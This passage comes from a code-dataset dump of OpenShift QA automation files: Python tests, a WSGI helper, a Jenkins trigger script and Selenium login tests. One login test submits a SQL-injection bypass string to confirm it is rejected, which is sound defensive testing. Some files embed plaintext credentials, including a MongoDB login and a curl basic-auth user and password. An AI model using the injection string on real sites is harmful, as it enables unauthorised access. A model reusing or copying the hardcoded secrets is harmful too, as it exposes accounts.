JBossHotDeployExplodedWarsWithoutJenkins\n\nclass JBossHotDeployPrebuiltWarsWithoutJenkins(JBossHotDeployExplodedWarsWithoutJenkins):\n\n def __init__(self, config):\n JBossHotDeployExplodedWarsWithoutJenkins.__init__(self, config)\n self.config.summary = \"[US2443] Hot deployment support for Jboss-as7 application with 2 pre-built wars\"\n\n def war(self, operation, war_file):\n source_file = \"%s/%s\" % ( self.config.app_template_dir, war_file )\n destination_dir = \"./%s/%s\" % ( self.config.application_name, self.config.deploy_dir )\n destination_file = \"%s/%s\" % ( destination_dir, war_file )\n marker_file_name = \"%s/%s.dodeploy\" % ( destination_dir, war_file )\n if operation == \"add\":\n # Copying the file\n shutil.copyfile(source_file, destination_file)\n # Creating the marker\n marker = file(marker_file_name, \"a\")\n marker.close()\n elif operation == \"remove\":\n # Removing the file\n os.remove(destination_file) \n # Removing marker\n os.remove(marker_file_name)\n # ... and deploying\n self.deploy()\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(JBossHotDeployPrebuiltWarsWithoutJenkins)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.7304452657699585, "alphanum_fraction": 0.7412755489349365, "avg_line_length": 27.65517234802246, "blob_id": "0348a6f79387d2ff5f2b63cee7b44b839c68a37a", "content_id": "4196e6f8d400ac75b3326e797aac5d9f112b9a49", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 831, "license_type": "no_license", "max_line_length": 107, "num_lines": 29, "path": "/automation/open/testmodules/RT/hot_deploy/jbossews_exploded_wars_without_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nNov 7, 2012\n\"\"\"\n\nimport rhtest\nimport common\nfrom jbossas_exploded_wars_without_jenkins import JBossHotDeployExplodedWarsWithoutJenkins\n\nclass EWSHotDeployExplodedWarsWithoutJenkins(JBossHotDeployExplodedWarsWithoutJenkins):\n def __init__(self, config):\n JBossHotDeployExplodedWarsWithoutJenkins.__init__(self, config)\n self.config.application_type = common.app_types['jbossews']\n self.config.deploy_dir = \"webapps\"\n self.config.summary = \"[US2513] Hot deployment support for JbossEWS application with exploded wars\"\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(EWSHotDeployExplodedWarsWithoutJenkins)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5269798636436462, "alphanum_fraction": 0.5315436124801636, "avg_line_length": 38.21052551269531, "blob_id": "69261c49044e62dc40a7e98555c0f6ca69fee406", "content_id": "afd24305a78014ef450f4c2f2ce49af91e6a1df6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3725, "license_type": "no_license", "max_line_length": 253, "num_lines": 95, "path": "/automation/open/testmodules/RT/scaling/prohibited_cartridges.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"\nAttila Nagy\[email protected]\n\n[US2089][BI] Prohibit cartridges except mysql and jenkins-client from being embedded to a scalable app\nhttps://tcms.engineering.redhat.com/case/145115/\n\"\"\"\nimport rhtest\nimport common\nimport testcase\nimport openshift\n\n\nclass ScalingProhibitedCartridges(rhtest.Test):\n def initialize(self):\n self.summary = \"[US2089][BI] Prohibit cartridges except mysql and jenkins-client from being embedded to a scalable app\"\n common.env_setup()\n \n def finalize(self):\n pass\n\n def test_method(self):\n \n self.info(\"===============================================\")\n self.info(\"Creating a scalable application (PHP)\")\n self.info(\"===============================================\")\n common.create_app(\n \"testapp\", \n common.app_types['php'], \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd,\n clone_repo = False,\n scalable = True\n )\n\n # Dependency\n self.info(\"===============================================\")\n self.info(\"Creating a Jenkins app (It's a dependency)\")\n self.info(\"===============================================\")\n common.create_app(\n \"jenkins\", \n common.app_types['jenkins'], \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd,\n clone_repo = False \n )\n\n for cartridge in common.cartridge_types.keys():\n if cartridge == \"mysql\" or cartridge == \"jenkins\" or cartridge == \"mongodb\":\n expect_return_rest = \"Added\"\n expect_return_cli = 0\n cartridge_enabled = True\n else:\n expect_return_rest = \"Failed to add\"\n expect_return_cli = 1\n cartridge_enabled = False\n \n self.info(\"===============================================\")\n self.info(\"Embedding cartridge via REST API - \" + cartridge)\n self.info(\"===============================================\")\n ( status, messages ) = self.config.rest_api.cartridge_add(\"testapp\", common.cartridge_types[cartridge])\n self.assert_true(messages[0][\"text\"].startswith(expect_return_rest))\n \n # Dependency\n if cartridge_enabled:\n common.command_get_status(\"rhc cartridge remove %s -a %s -l %s -p '%s' --confirm %s\" % (common.cartridge_types[cartridge], \"testapp\", self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS))\n \n self.info(\"===============================================\")\n self.info(\"Embedding cartridge in the command line - \" + cartridge)\n self.info(\"===============================================\")\n ret_code = common.embed(\"testapp\", \"add-\" + common.cartridge_types[cartridge])\n self.assert_equal(ret_code, expect_return_cli)\n \n # Cleaning\n if cartridge_enabled:\n common.command_get_status(\"rhc cartridge remove %s -a %s -l %s -p '%s' --confirm %s\" % (common.cartridge_types[cartridge], \"testapp\", self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS))\n\n # Everything is OK: Passed\n return self.passed(self.summary)\n \n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(ScalingProhibitedCartridges)\n #### user can add multiple sub tests here.\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6132723093032837, "alphanum_fraction": 0.6218535304069519, "avg_line_length": 31.98113250732422, "blob_id": "cc2df07eda87f04b6067ad6cc0f9185b17cb2e21", "content_id": "0ab0b59da5e80897c14f13176dded82e5a30957e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1748, "license_type": "no_license", "max_line_length": 93, "num_lines": 53, "path": "/automation/open/testmodules/RT/limits/app_template/max_gears/application", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\nimport os\nimport sys\nfrom pymongo import Connection\n\nvirtenv = os.environ['APPDIR'] + '/virtenv/'\nos.environ['PYTHON_EGG_CACHE'] = os.path.join(virtenv, 'lib/python2.6/site-packages')\nvirtualenv = os.path.join(virtenv, 'bin/activate_this.py')\ntry:\n execfile(virtualenv, dict(__file__=virtualenv))\nexcept IOError:\n pass\n#\n# IMPORTANT: Put any additional includes below this line. If placed above this\n# line, it's possible required libraries won't be in your searchable path\n# \n\ndef application(environ, start_response):\n \n ctype = 'text/plain'\n if environ['PATH_INFO'] == '/health':\n response_body = \"1\"\n elif environ['PATH_INFO'] == '/set-max-gears':\n try:\n c = Connection('localhost', 27017)\n broker = c.openshift_broker_dev\n broker.authenticate('libra', 'momo')\n userdb = broker['user']\n user_details = { '_id' : '#mongodb_user_email#' }\n user = userdb.find_one( user_details )\n user['max_gears'] = #mongodb_max_gears#\n userdb.update( user_details, user )\n except Exception as e:\n response_body = \"DB OPERATION FAILS: %s - %s\" % ( type(e), e.args )\n else:\n response_body = \"DB OPERATION SUCCESS\"\n else:\n response_body = 'test'\n\n status = '200 OK'\n response_headers = [('Content-Type', ctype), ('Content-Length', str(len(response_body)))]\n\t\n start_response(status, response_headers)\n return [response_body]\n\n#\n# Below for testing only\n#\nif __name__ == '__main__':\n from wsgiref.simple_server import make_server\n httpd = make_server('localhost', 8051, application)\n # Wait for a single request, serve it and quit.\n httpd.handle_request()\n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.6810207366943359, "avg_line_length": 19.225807189941406, "blob_id": "9274c30925823673245525a4f86e4a6d28169789", "content_id": "c26f48c483790f6feca6069bc75a8f994a650f63", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 627, "license_type": "no_license", "max_line_length": 91, "num_lines": 31, "path": "/automation/open/project.rst", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "Project RHTEST page\n===================\n\n.. literalinclude:: README\n\n\nLauncher:\n---------\n\n ./bin/launcher --help\n\nTo run particular testecases selected by tags against EC2 instance tagged by 'QE_user-dev':\n ./bin/launcher -t \"Test by sprint22 tag\" -g sprint22 -A QE_user-dev\n\n\nFollowing example will run the same tests against current devenv AMI-ID:\n\n ./bin/launcher -t \"Test by sprint22 tag\" -g sprint22 \n\n\nEnvironment variables:\n----------------------\n\n* RHTEST_DEBUG\n* RHTEST_HOME\n* RHTEST_ARGS\n* RHTEST_REST_TIMEOUT\n* RHTEST_RHC_CLIENT_OPTIONS\n* OPENSHIFT_libra_server\n* OPENSHIFT_user_email\n* OPENSHIFT_user_passwd\n" }, { "alpha_fraction": 0.52925044298172, "alphanum_fraction": 0.5351919531822205, "avg_line_length": 34.57723617553711, "blob_id": "820e04303bb44d5d4c6079f2f5a86f71bdc1a0e7", "content_id": "3fbe5521d8de779ff2b8fe3469a0031578ccdfb1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 4376, "license_type": "no_license", "max_line_length": 144, "num_lines": 123, "path": "/open_automation/bin/jenkins_job.sh", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# File name: jenkins_job.sh\n# Date: 2012/10/04 09:31\n# Author: [email protected]\n\n####################################\n### checking mandatory variables ###\n####################################\ntest -z \"$JENKINS_JOB_TOKEN\" && { echo \"ERROR: Missing JENKINS_JOB_TOKEN variable\"; exit 1; } \ntest -z \"$TCMS_USER\" && { echo \"ERROR: Missing TCMS_USER variable\"; exit 1; } \ntest -z \"$TCMS_PASSWORD\" && { echo \"ERROR: Missing TCMS_PASSWORD variable\"; exit 1; } \n\n\n#### SET THE ENVIRONMENT VARIABLES AS NEEDED\nexport RHTEST_HOME=$(pwd)\nexport PATH=${RHTEST_HOME}/bin:${RHTEST_HOME}/lib:${RHTEST_HOME}/lib/supports:${RHTEST_HOME}/testmodules:$PATH\nexport PYTHONPATH=${RHTEST_HOME}/bin:${RHTEST_HOME}/lib:${RHTEST_HOME}/lib/supports:${RHTEST_HOME}/testmodules:$PYTHONPATH\n\n\n#### THIS WILL AUTHENTICATE TO NITRATE\n\necho -e \"\\nDEBUG: Kerberos init...\"\nkinit.sh || exit 1\n\n\ntest -n \"$AMI_ID\" && OPTIONS=\"${OPTIONS} -m $AMI_ID -z t1.micro \"\ntest -n \"$TESTRUN_ID\" && OPTIONS=\"${OPTIONS} -i $TESTRUN_ID \"\ntest -n \"$INSTANCE_IP\" && OPTIONS=\"${OPTIONS} -a $INSTANCE_IP \"\ntest -n \"$TESTRUN_TAG\" && OPTIONS=\"${OPTIONS} -t $TESTRUN_TAG \"\ntest -n \"$TCMS_TAGS\" && OPTIONS=\"${OPTIONS} -g $TCMS_TAGS \"\n\n\nif [ \"$SLAVE\" == \"false\" ]; then\n echo \"##########################################################\"\n echo \"MASTER...\"\n echo \"##########################################################\"\n\n test -z \"$POOL_ACCOUNT\" && { echo \"ERROR: Missing POOL_ACCOUNT variable\"; exit 1; } \n\n #WHERE TO RUN...\n if [ -n \"$INSTANCE_IP\" ]; then\n WHERE=\"{ \\\"name\\\": \\\"INSTANCE_IP\\\", \\\"value\\\": \\\"$INSTANCE_IP\\\" }, \"\n else\n WHERE=\"{ \\\"name\\\": \\\"AMI_ID\\\", \\\"value\\\": \\\"$AMI_ID\\\" }, \"\n fi\n\n if [ -z \"$TESTRUN_ID\" ]; then\n if [ -z \"$TCMS_TAGS\" ]; then\n echo \"ERROR: Missing TCMS_TAGS argument, when no TESTRUN_ID was defined\"\n exit 1\n fi\n echo -e \"\\nDEBUG: Creating new testrun...\"\n TESTRUN_ID=$(create_test_run.py -t $TESTRUN_TAG -g $TCMS_TAGS | awk -F ':' '/test_run/{print $2}')\n if [ -z \"$TESTRUN_ID\" ]; then\n echo \"ERROR: Unable to create testrun\"\n exit 1\n fi\n echo \"DEBUG: testrun_id=$TESTRUN_ID\"\n else\n if [ \"$RESET_TESTRUN\" == \"true\" ]; then\n echo -e \"\\nDEBUG: Resetting testrun...\"\n python $RHTEST_HOME/bin/reset_testrun.py $TESTRUN_ID\n if [ -n \"$TCMS_TAGS\" ]; then\n echo \"DEBUG: Refresing testrun with $TCMS_TAGS\"\n python $RHTEST_HOME/bin/refresh_testrun_by_tag.py $TESTRUN_ID $TCMS_TAGS\n fi\n fi\n fi\n\n#\n# Each slave can run ONLY with TESTRUN_ID !\n#\n for acc in $POOL_ACCOUNT; do\n OPENSHIFT_user_email=$(echo $acc | awk -F \":\" '{print $1}')\n OPENSHIFT_user_passwd=$(echo $acc | awk -F \":\" '{print $2}')\n \n \n json=\"{ \\\"parameter\\\": [ \n$WHERE\n{ \\\"name\\\": \\\"TESTRUN_ID\\\", \\\"value\\\": \\\"$TESTRUN_ID\\\" },\n{ \\\"name\\\": \\\"OPENSHIFT_user_passwd\\\", \\\"value\\\":\\\"$OPENSHIFT_user_passwd\\\"}, \n{ \\\"name\\\": \\\"OPENSHIFT_user_email\\\", \\\"value\\\":\\\"$OPENSHIFT_user_email\\\"}, \n{ \\\"name\\\": \\\"SLAVE\\\", \\\"value\\\":\\\"true\\\" },\n{ \\\"name\\\": \\\"TCMS_USER\\\", \\\"value\\\" : \\\"$TCMS_USER\\\"},\n{ \\\"name\\\": \\\"TCMS_PASSWORD\\\", \\\"value\\\":\\\"$TCMS_PASSWORD\\\" } ]}\"\n\n JENKINS_URL=\"http://ciqe.englab.nay.redhat.com\"\n DELAY=$((DELAY+20))\n URL=\"$JENKINS_URL/job/$JOB_NAME/build?token=$JENKINS_JOB_TOKEN&delay=$DELAY\"\n \n curl -s -L -k -X POST -H \"Accept:application/json\" -u mzimen:redhat -d token=devenv $URL --data-urlencode json=\"$json\" | elinks -dump |head\n echo -e \"\\n****************************************************************\\n\"\n\n done\nelse\n###############################################################################\n###############################################################################\n###############################################################################\n echo -e \"\\nSLAVE\\n\"\n #this might have influen\n echo \"DEBUG: Updating the client...\"\n if [ -n \"$CLIENT_VERSION\" ]; then\n python $RHTEST_HOME/bin/update_rhc_client.py --release $CLIENT_VERSION\n else\n python $RHTEST_HOME/bin/update_rhc_client.py \n fi\n\n echo -e \"\\nDEBUG: Launching the testrun...\\n\"\n\n python $RHTEST_HOME/bin/launcher.py $OPTIONS\n if [ -n \"$SHUTDOWN\" ]; then\n if [ -n \"$INSTANCE_NAME\" ]; then\n echo \"ERROR: Missing INSTANCE_NAME for shutdown the instance\"\n else\n python $RHTEST_HOME/bin/shutdow_instance.py -i $INSTANCE_NAME\n fi\n fi\nfi\n\nexit 0\n\n#### END\n" }, { "alpha_fraction": 0.6593483686447144, "alphanum_fraction": 0.6632638573646545, "avg_line_length": 43.693748474121094, "blob_id": "403f32a766f570312df0849b166fc2e9b7b03fd4", "content_id": "57d10e25835ce2ebf410d7ca33d029ef791f5d70", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7151, "license_type": "no_license", "max_line_length": 112, "num_lines": 160, "path": "/automation/open/testmodules/UI/web/tc_login.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.common.exceptions import NoSuchElementException\nimport unittest, time, re\nimport baseutils\nimport config\nimport HTMLTestRunner\n\nclass LoginPage(unittest.TestCase):\n\n def setUp(self):\n self.driver = \"\"\n self.base_url = \"\"\n self.profile = \"\"\n self.verificationErrors = []\n baseutils.initiate(self)\n\n def test_check_login_form(self):\n baseutils.go_to_home(self)\n baseutils.go_to_signin(self)\n baseutils.assert_element_present_by_css(self,\"a.password_reset.more\")\n # baseutils.is_element_hidden(self,By.ID,\"login-form\")\n baseutils.click_element_by_css_no_wait(self,\"a.sign_up.more\")\n time.sleep(5)\n baseutils.is_element_displayed(self,By.ID,\"signup\")\n baseutils.click_element_by_css_no_wait(self,\"#signup > a.close_button > img\")\n time.sleep(5)\n baseutils.is_element_hidden(self,By.ID,\"signup\")\n #baseutils.check_title(self,\"OpenShift by Red Hat | Sign up for OpenShift\")\n# baseutils.assert_text_equal_by_css(self,\"Need to Register instead?\",\"#register > h2\")\n\n def test_login_invalid_user(self):\n baseutils.go_to_home(self)\n baseutils.go_to_signin(self)\n baseutils.login(self,\"xtian\",config.password)\n baseutils.assert_text_equal_by_css(self,\"Invalid username or password\",\"div.message.error\")\n\n\n def test_login_without_user(self):\n baseutils.go_to_home(self)\n baseutils.go_to_signin(self)\n baseutils.login(self,\"\",config.password)\n baseutils.assert_text_equal_by_css(self,\"This field is required.\",\"label.error\")\n\n def test_login_without_pwd(self):\n baseutils.go_to_home(self)\n baseutils.go_to_signin(self)\n baseutils.login(self,config.granted_user[0],\"\")\n baseutils.assert_text_equal_by_css(self,\"This field is required.\",\"label.error\")\n\n\n def test_login_granted_user(self):\n baseutils.go_to_home(self)\n baseutils.go_to_signin(self)\n baseutils.login(self,config.granted_user[0],config.granted_user[1])\n time.sleep(5)\n baseutils.check_title(self,\"OpenShift by Red Hat | Cloud Platform\")\n baseutils.assert_element_present_by_link_text(self,\"Sign out\") \n _greetings=baseutils.generate_greetings(config.granted_user[0])\n baseutils.assert_element_present_by_link_text(self,_greetings)\n\n\n def test_login_sql_bypass(self):\n baseutils.go_to_home(self)\n baseutils.go_to_signin(self)\n baseutils.login(self,\"[email protected] or 1=1\",config.password)\n baseutils.assert_text_equal_by_css(self,\"Invalid username or password\",\"div.message.error\")\n\n\n\n def test_login_session_existing(self):\n baseutils.go_to_home(self)\n baseutils.go_to_signin(self)\n baseutils.login(self,config.granted_user[0],config.granted_user[1])\n time.sleep(5)\n # baseutils.wait_for_ajax(self)\n baseutils.check_title(self,\"OpenShift by Red Hat | Cloud Platform\")\n # baseutils.assert_element_present_by_link_text(self,\"Get started!\")\n baseutils.assert_element_present_by_link_text(self,\"Sign out\") \n _greetings=baseutils.generate_greetings(config.granted_user[0])\n baseutils.assert_element_present_by_link_text(self,_greetings)\n baseutils.go_to_express(self)\n baseutils.assert_element_present_by_link_text(self,\"Sign out\")\n '''\n def test_login_from_express_regisra_link(self):\n self.driver.get(config.confirm_url_express_yujzhang)\n# print config.confirm_url_express_yujzhang\n baseutils.check_title(self,\"OpenShift by Red Hat | Sign in to OpenShift\")\n# baseutils.assert_text_equal_by_css(self,\"Click here to reset your password\",\"p\")\n baseutils.assert_value_equal_by_id(self,config.email(config.confirm_url_express_yujzhang),\"login_input\")\n baseutils.input_by_id(self,\"pwd_input\",config.granted_user2[1])\n print config.granted_user2[1]\n baseutils.scroll_by(self)\n baseutils.click_element_by_css_no_wait(self,\"input.button\")\n baseutils.check_title(self,\"OpenShift by Red Hat | Express\")\n baseutils.assert_text_equal_by_css(self,\"WHAT\\'S EXPRESS?\",\"#about > header > h1\")\n \n \n def test_login_from_flex_regisra_link(self):\n self.driver.get(config.confirm_url_flex)\n baseutils.check_title(self,\"OpenShift by Red Hat | Sign in to OpenShift\")\n# baseutils.assert_text_equal_by_css(self,\"Click here to reset your password\",\"p\")\n baseutils.assert_value_equal_by_id(self,config.email(config.confirm_url_flex),\"login_input\")\n baseutils.input_by_id(self,\"pwd_input\",config.password)\n baseutils.scroll_by(self)\n baseutils.click_element_by_css_no_wait(self,\"input.button\")\n baseutils.check_title(self,\"OpenShift by Red Hat | Flex\")\n baseutils.assert_text_equal_by_css(self,\"WHAT\\'S FLEX?\",\"#about > header > h1\")\n '''\n def test_login_logout_back(self):\n baseutils.go_to_home(self)\n baseutils.go_to_signin(self)\n baseutils.login(self,config.granted_user[0],config.granted_user[1])\n baseutils.check_title(self,\"OpenShift by Red Hat | Cloud Platform\")\n # baseutils.assert_element_present_by_link_text(self,\"Get started!\")\n _greetings=baseutils.generate_greetings(config.granted_user[0])\n baseutils.assert_element_present_by_link_text(self,_greetings)\n baseutils.assert_element_present_by_link_text(self,\"Sign out\")\n baseutils.logout(self)\n baseutils.go_back(self)\n self.driver.refresh()\n baseutils.assert_element_present_by_link_text(self,\"Sign in\")\n\n def test_login_cookie_deleted(self):\n baseutils.go_to_home(self)\n baseutils.go_to_signin(self)\n baseutils.login(self,config.granted_user[0],config.granted_user[1])\n time.sleep(5)\n # baseutils.wait_for_ajax(self)\n baseutils.check_title(self,\"OpenShift by Red Hat | Cloud Platform\")\n # baseutils.assert_element_present_by_link_text(self,\"Get started!\")\n _greetings=baseutils.generate_greetings(config.granted_user[0])\n baseutils.assert_element_present_by_link_text(self,_greetings)\n baseutils.assert_element_present_by_link_text(self,\"Sign out\")\n self.driver.delete_cookie(\"_rhc_session\")\n self.driver.delete_cookie(\"rh_sso\")\n self.driver.refresh()\n baseutils.assert_element_present_by_link_text(self,\"Sign in\")\n \n\n \n def tearDown(self):\n self.driver.quit()\n if len(self.verificationErrors)==1:\n self.assertEqual([''], self.verificationErrors)\n else:self.assertEqual([], self.verificationErrors)\n \n '''\n if self.verificationErrors != [] or self.verificationErrors != [''] :\n for error in self.verificationErrors:\n if error.strip()!=[''] or error.strip()!=[]:\n self.fail(error.strip())\n '''\n \n# self.assertEqual([], self.verificationErrors)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n #HTMLTestRunner.main()\n" }, { "alpha_fraction": 0.5841924548149109, "alphanum_fraction": 0.5917525887489319, "avg_line_length": 28.09000015258789, "blob_id": "2504757de7860347a001bef9ad39c73781e99f7a", "content_id": "c2c00a8b48b9d6c5e590e0e8644b688c8b45235a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2910, "license_type": "no_license", "max_line_length": 113, "num_lines": 100, "path": "/automation/open/testmodules/RT/cartridge/jbossas_java7.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\[email protected]\n\nJul 26, 2012\n\"\"\"\n\nimport rhtest\nimport common\nimport os\nfrom shutil import rmtree\nfrom time import sleep\n\nclass JBossJava7Test(rhtest.Test):\n\n def __init__(self, config):\n rhtest.Test.__init__(self, config)\n self.config.application_name = common.getRandomString()\n self.config.application_type = common.app_types[\"jbossas\"]\n self.config.git_repo = \"./%s\" % self.config.application_name\n self.config.scalable = False\n self.config.java_version = \"1.7\"\n\tself.config.summary = \"[US2218] Java 7 with non-scaling JBoss application\"\n \n def log_info(self, message):\n self.info(\"========================\")\n self.info(message)\n self.info(\"========================\")\n\n def initialize(self):\n self.log_info(\"Initializing\")\n common.env_setup()\n common.create_app(\n self.config.application_name,\n self.config.application_type,\n self.config.OPENSHIFT_user_email,\n self.config.OPENSHIFT_user_passwd,\n clone_repo = True,\n git_repo = self.config.git_repo,\n scalable = self.config.scalable\n )\n\n def finalize(self):\n self.log_info(\"Finalizing\")\n rmtree(self.config.git_repo)\n\n def check_marker(self):\n self.assert_true(\"Marker must exist\", os.path.exists(self.config.git_repo + \"/.openshift/markers/java7\"))\n\n def deploy_version_checking_app(self):\n # Editing file\n jsp_file = open(self.config.git_repo + \"/src/main/webapp/version.jsp\", \"w\")\n jsp_file.write('<%@ page contentType=\"text/plain\" %>')\n jsp_file.write('<%@ page trimDirectiveWhitespaces=\"true\" %>')\n jsp_file.write('<% out.println(\"Java version: \" + System.getProperty(\"java.version\")); %>')\n jsp_file.close()\n # Deploying\n deployment_steps = [\n \"cd %s\" % self.config.git_repo,\n \"git add .\",\n \"git commit -a -m testing\",\n \"git push\"\n ]\n common.command_get_status(\" && \".join(deployment_steps))\n \n def test_method(self):\n self.check_marker()\n\n self.deploy_version_checking_app()\n\n\tsleep(30) # Waiting for the application\n\n\tnumber_of_operations = 1\n\tif self.config.scalable:\n\t\tnumber_of_operations = 3\n\n\tfor i in range(0, number_of_operations):\n ret_code = common.check_web_page_output(\n \tself.config.application_name, \n \t\"version.jsp\",\n \t\"Java version: \" + self.config.java_version\n )\n \t self.assert_equal(ret_code, 0)\n\n # Everything is OK\n return self.passed(self.config.summary) \n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(JBossJava7Test)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n" }, { "alpha_fraction": 0.5734363198280334, "alphanum_fraction": 0.5806533098220825, "avg_line_length": 44.64739990234375, "blob_id": "f4b9446282d7604dd5e410ce8bcc1568d571278a", "content_id": "cc14768da72bc0a86646c81190bcc4bd373fbe21", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7898, "license_type": "no_license", "max_line_length": 306, "num_lines": 173, "path": "/automation/open/testmodules/RT/cartridge/mysql_after_alter_namespace.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\"\"\"\nJiangtao Zhao\[email protected]\nFeb 10, 2012\n[rhc-cartridge]test mysql works well after altering namespace\nhttps://tcms.engineering.redhat.com/case/122288/\n\"\"\"\n\n\nimport os\nimport sys\nimport re\nimport string\nimport random\nimport testcase\nimport common\nimport OSConf\nimport rhtest\nimport openshift\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n self.summary = \"[rhc-cartridge]test mysql works well after altering namespace\"\n try:\n self.test_variant = self.config.test_variant\n self.info(\"Missing OPENSHIFT_test_name, using `ruby` as default.\")\n except:\n self.test_variant = 'ruby'\n\n self.new_domain_name = common.getRandomString(10)\n\n self.app_name = \"app\"+self.test_variant\n self.git_repo = \"./%s\" % (self.app_name)\n self.app_type = common.app_types[self.test_variant]\n self.domain_name = common.get_domain_name()\n self.steps_list = []\n\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n\nclass MysqlAfterAlterNamespace(OpenShiftTest):\n def test_method(self):\n #1\n self.steps_list.append(testcase.TestCaseStep(\"1.Create an express app\",\n common.create_app,\n function_parameters=[self.app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n expect_description=\"the app should be created successfully\",\n expect_return=0))\n\n #2\n self.steps_list.append(testcase.TestCaseStep(\"2.Embed mysql to the app\",\n common.embed,\n function_parameters=[self.app_name, \"add-mysql-5.1\", self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n expect_description=\"mysql cartridge is embedded successfully\",\n expect_return=0))\n\n #3\n cmd_prefix = \"unalias cp ; \"\n cmd_dict = {\n \"jbossas\": \"cp -f %s/app_template/mysql/mysql.jsp %s/src/main/webapp/\" % (WORK_DIR, self.git_repo),\n \"php\" : \"cp -f %s/app_template/mysql/mysql.php %s/php/\" % (WORK_DIR, self.git_repo),\n \"perl\" : \"cp -f %s/app_template/mysql/mysql.pl %s/perl/\" % (WORK_DIR, self.git_repo),\n \"python\" : \"cp -f %s/app_template/mysql/application %s/wsgi/\" % (WORK_DIR, self.git_repo),\n \"ruby\" : \"cp -f %s/app_template/mysql/config.ru %s/\" % (WORK_DIR, self.git_repo)}\n\n cmd = ''.join((cmd_prefix, cmd_dict[self.test_variant]))\n self.steps_list.append(testcase.TestCaseStep(\"3.Copy the corresponding app template to the app repo\",\n cmd,\n expect_description=\"Copy succeeded\",\n expect_return=0))\n\n #4\n self.steps_list.append(testcase.TestCaseStep(\n \"4.Change the mysql url, username, password, database name to the app's ones\",\n \"%s\",\n string_parameters=[self.get_cmd()],\n expect_description=\"Change succeeded\",\n expect_return=0))\n\n if self.test_variant in (\"python\", \"ruby\"):\n suffix = \"mysql\"\n elif self.app_type.find(\"php\") != -1:\n suffix = \"mysql.php\"\n elif self.app_type.find(\"jboss\") != -1:\n suffix = \"mysql.jsp\"\n elif self.app_type.find(\"perl\") != -1:\n suffix = \"mysql.pl\"\n\n def get_app_url(app_name, suffix):\n def closure():\n url = OSConf.get_app_url(app_name)\n return url+\"/\"+suffix\n return closure\n\n #5\n self.steps_list.append(testcase.TestCaseStep(\"5.Access the app to check if mysql works\",\n common.grep_web_page,\n function_parameters=[get_app_url(self.app_name, suffix), \n \"Tim Bunce, Advanced Perl DBI\", \n \"-H 'Pragma: no-cache'\", 5, 6],\n expect_description=\"mysql works well\",\n expect_return=0))\n \n #6\n self.steps_list.append(testcase.TestCaseStep(\"6.Alter the domain name\",\n common.alter_domain,\n function_parameters=[self.new_domain_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n expect_description=\"Domain was altered successfully\",\n expect_return=0))\n\n #7\n self.steps_list.append(testcase.TestCaseStep(\"7.Access the app again to check if mysql still works\",\n common.grep_web_page,\n function_parameters=[get_app_url(self.app_name,suffix), \n \"Tim Bunce, Advanced Perl DBI\", \n \"-H 'Pragma: no-cache'\", 5, 6],\n expect_description=\"mysql still works well\",\n expect_return=0))\n #8\n self.steps_list.append(testcase.TestCaseStep(\"8.Change the domain name back\",\n common.alter_domain,\n function_parameters=[self.domain_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n expect_description=\"Domain was changed back successfully\",\n expect_return=0))\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if 